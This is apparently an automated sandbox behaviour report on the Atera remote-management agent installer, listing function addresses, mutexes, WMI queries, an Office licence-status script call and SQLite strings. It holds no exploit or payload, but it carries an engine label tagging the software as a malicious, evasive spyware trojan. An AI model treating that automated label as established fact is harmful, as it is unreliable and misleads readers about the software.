                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19240A037_2_00007FFDF19240A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF194831037_2_00007FFDF1948310
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18A231037_2_00007FFDF18A2310
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF192A2F037_2_00007FFDF192A2F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18A033037_2_00007FFDF18A0330
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19222B037_2_00007FFDF19222B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF190060037_2_00007FFDF1900600
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF193E59037_2_00007FFDF193E590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF196659037_2_00007FFDF1966590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF193A5D037_2_00007FFDF193A5D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19A05D037_2_00007FFDF19A05D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18885D437_2_00007FFDF18885D4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19BE5B037_2_00007FFDF19BE5B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18D051037_2_00007FFDF18D0510
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188A52437_2_00007FFDF188A524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF190455037_2_00007FFDF1904550
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18E64A037_2_00007FFDF18E64A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18944DC37_2_00007FFDF18944DC
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF191A7E037_2_00007FFDF191A7E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188E80C37_2_00007FFDF188E80C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF189273837_2_00007FFDF1892738
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF189E72037_2_00007FFDF189E720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19BC68037_2_00007FFDF19BC680
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1888A3C37_2_00007FFDF1888A3C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18DE99037_2_00007FFDF18DE990
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF197691037_2_00007FFDF1976910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF189886037_2_00007FFDF1898860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF194686037_2_00007FFDF1946860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18D88A037_2_00007FFDF18D88A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18828C037_2_00007FFDF18828C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF192CC0037_2_00007FFDF192CC00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18D8B9037_2_00007FFDF18D8B90
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF196AB0037_2_00007FFDF196AB00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18FCB5037_2_00007FFDF18FCB50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18C8A6037_2_00007FFDF18C8A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF194AA7037_2_00007FFDF194AA70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18A6A8037_2_00007FFDF18A6A80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18E0E3037_2_00007FFDF18E0E30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19BCD6037_2_00007FFDF19BCD60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1884DB437_2_00007FFDF1884DB4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18F4D0037_2_00007FFDF18F4D00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1906D2037_2_00007FFDF1906D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1948D2037_2_00007FFDF1948D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19D0D3037_2_00007FFDF19D0D30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF19B4C8037_2_00007FFDF19B4C80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18CACD037_2_00007FFDF18CACD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1896CC037_2_00007FFDF1896CC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18C902037_2_00007FFDF18C9020
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1892F8C37_2_00007FFDF1892F8C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18CAFB037_2_00007FFDF18CAFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF191EFD037_2_00007FFDF191EFD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18ACE7037_2_00007FFDF18ACE70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188CEA837_2_00007FFDF188CEA8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B40ED6D37_2_00007FFD9B40ED6D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B40BD6137_2_00007FFD9B40BD61
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B405D0F37_2_00007FFD9B405D0F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B40D28C37_2_00007FFD9B40D28C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B6232A637_2_00007FFD9B6232A6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B622BCF37_2_00007FFD9B622BCF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B62ADD837_2_00007FFD9B62ADD8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B6224E837_2_00007FFD9B6224E8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B738ED637_2_00007FFD9B738ED6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B734D1737_2_00007FFD9B734D17
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B733C7137_2_00007FFD9B733C71
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B730D1537_2_00007FFD9B730D15
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFD9B7F35A437_2_00007FFD9B7F35A4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDF19D1D30 appears 114 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDF19D1B70 appears 102 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDF19D06B0 appears 145 times
                                Source: AteraAgent.exe.1.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                                Source: AteraAgent.exe0.1.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@103/522@0/12
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA NetworksJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4320:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7604:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5632:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeMutant created: \BaseNamedObjects\Global\NLog-FileFileArchiveLock-c:_program files (x86)_atera networks_ateraagent_packages_agentpackageosupdates_log.txt
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5660:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7708:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5680:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7184:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\GenericDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_chocolatey.log
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7516:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: NULL
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7612:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7820:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7360:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7776:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeMutant created: \BaseNamedObjects\NLogMutexTester
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\SNMPDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\Global\{bd59231e-97d1-4fc0-a975-80c3fed498b7}
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7260:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_choco.summary.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\HttpDevicesFileLock
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8016:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8152:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4124:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\ServerDevicesFileLock
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFBE8D32C4C485895E.TMPJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2E58.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4468656 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;kDELETE FROM ThresholdDuration WHERE Identifier = @id;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);@X9
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);@X9
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);kExecuteScriptAsync SystemTools Start scriptGuid : {0}Wrunscriptguid {0} 10 W10= disableSendResult
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D72349F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;@X9
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS StatisticsSendTime (Id INTEGER PRIMARY KEY,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);%StatisticsSendTime
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL);
